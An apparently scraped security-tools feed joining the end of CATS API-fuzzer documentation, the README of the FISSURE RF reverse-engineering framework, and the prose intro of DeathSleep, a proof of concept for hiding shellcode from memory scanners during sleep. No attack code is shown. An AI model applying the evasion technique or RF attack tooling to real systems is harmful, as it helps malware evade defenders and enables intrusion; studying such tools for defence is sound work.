There isn't a consensus on how you should handle situations when you trail or prefix valid values with spaces. One strategy will be to have the service trimming spaces before doing the validation, while some other services will just validate them as they are. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:

  • trimAndValidate means that the service will first trim the spaces and after that run the validation
  • validateAndTrim means that the service runs the validation first without any trimming of spaces

This is a global setting i.e. configured when CATS starts and all Fuzzer expects a consistent behaviour from all the service endpoints.

URL Parameters

There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets. {version} is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams argument. You can supply a ; separated list of name:value pairs to replace the name parameters with their corresponding value. For example supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.

Dealing with AnyOf, AllOf and OneOf

CATS also supports schemas with oneOf, allOf and anyOf composition. CATS wil consider all possible combinations when creating the fuzzed payloads.

Dynamic values in configuration files

The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData support setting dynamic values for the inner fields. For now the support only exists for java.time.* and org.apache.commons.lang3.*, but more types of elements will come in the near future.

Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10). This will return an ISO compliant time in UTC format.

A functionalFuzzer using this can look like:

/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD

You can also check the responses using a similar syntax and also accounting for the actual values returned in the response. This is a syntax than can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check if the expiry field returned in the json response, parsed as date, is after the current date.

The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.

Running behind proxy

If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost and --proxyPort. A typical run with proxy settings on localhost:8080 will look as follows:

> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080

Dealing with Authentication

HTTP header(s) based authentication

CATS supports any form of HTTP header(s) based authentication (basic auth, oauth, custom JWT, apiKey, etc) using the headers mechanism. You can supply the specific HTTP header name and value and apply to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.

One-Way or Two-Way SSL

By default, CATS trusts all server certificates and doesn't perform hostname verification.

For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:

  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key within the sslKeystore

For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.

Limitations

Native Binaries

When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever can discover at compile time. The following classes are currently supported:

java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class, 
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class

API specs

At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ... subcommand.

Media types and HTTP methods

The Fuzzers has the following support for media types and HTTP methods:

  • application/json and application/x-www-form-urlencoded media types only
  • HTTP methods: POST, PUT, PATCH, GET and DELETE

Additional Parameters

If a response contains a free Map specified using the additionalParameters tag CATS will issue a WARN level log message as it won't be able to validate that the response matches the schema.

Regexes within 'pattern'

CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.

Custom Files General Info

All custom files that can be used by CATS (functionalFuzzerFile, headers, refData, etc) are in a YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use a JsonPath syntax using either # or . as separators. You can find some selector examples here: JsonPath.

Contributing

Please refer to CONTRIBUTING.md.



FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering

18 September 2022 at 11:30
By: Zion3R


Frequency Independent SDR-based Signal Understanding and Reverse Engineering

FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.

The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.

The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.


Getting Started

Supported

There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.

Operating System FISSURE Branch
Ubuntu 18.04 (x64) Python2_maint-3.7
Ubuntu 18.04.5 (x64) Python2_maint-3.7
Ubuntu 18.04.6 (x64) Python2_maint-3.7
Ubuntu 20.04.1 (x64) Python3_maint-3.8
Ubuntu 20.04.4 (x64) Python3_maint-3.8

In-Progress (beta)

Operating System FISSURE Branch
Ubuntu 22.04 (x64) Python3_maint-3.8

Note: Certain software tools do not work for every OS. Refer to Software And Conflicts

Installation

git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install

This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.

Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).


Python2_maint-3.7 Python3_maint-3.8

It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.


Usage

fissure

Refer to the FISSURE Help menu for more details on usage.

Details

Components

  • Dashboard
  • Central Hub (HIPRFISR)
  • Target Signal Identification (TSI)
  • Protocol Discovery (PD)
  • Flow Graph & Script Executor (FGE)


Capabilities

Signal Detector



IQ Manipulation


Signal Lookup


Pattern Recognition


Attacks


Fuzzing


Signal Playlists


Image Gallery


Packet Crafting


Scapy Integration


CRC Calculator


Logging


Lessons

FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.

  • Lesson1: OpenBTS
  • Lesson2: Lua Dissectors
  • Lesson3: Sound eXchange
  • Lesson4: ESP Boards
  • Lesson5: Radiosonde Tracking
  • Lesson6: RFID
  • Lesson7: Data Types
  • Lesson8: Custom GNU Radio Blocks
  • Lesson9: TPMS
  • Lesson10: Ham Radio Exams
  • Lesson11: Wi-Fi Tools

Roadmap

  • Add more hardware types, RF protocols, signal parameters, analysis tools
  • Support more operating systems
  • Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
  • Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
  • Transition the main FISSURE components to a generic sensor node deployment scheme

Contributing

Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:

  • New feature suggestions and design changes
  • Software tools with installation steps
  • New lessons or additional material for existing lessons
  • RF protocols of interest
  • More hardware and SDR types for integration
  • IQ analysis scripts in Python
  • Installation corrections and improvements

Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:

  1. Fork the project
  2. Create your feature branch (git checkout -b feature/AmazingFeature)
  3. Commit your changes (git commit -m 'Add some AmazingFeature')
  4. Push to the branch (git push origin feature/AmazingFeature)
  5. Open a pull request

Creating Issues to bring attention to bugs is also welcomed.

Collaborating

Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities–whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.

License

GPL-3.0

For license details, see LICENSE file.

Contact

Follow on Twitter: @FissureRF, @AinfoSec

Chris Poore - Assured Information Security, Inc. - [email protected]

Business Development - Assured Information Security, Inc. - [email protected]

Acknowledgments

Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.



DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution

17 September 2022 at 11:30
By: Zion3R


A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.


Intro

Sleep and obfuscation methods are well known in the maldev community, with different implementations, they have the objective of hiding from memory scanners while sleeping, usually changing page protections and even adding cool features like encrypting the shellcode, but there is another important point to hide our shellcode, and is hiding the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stack… if there is no stack :)

The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.

The main implementation showed here holds everything that we need to take out of the stack in the data section, as global variables, but an impletementation moving everything to the heap will be published soon. It aims to show some key modifications that needs to be done to make this code pic and injectable.

This repository is mirrored between GitHub and GitLab.



❌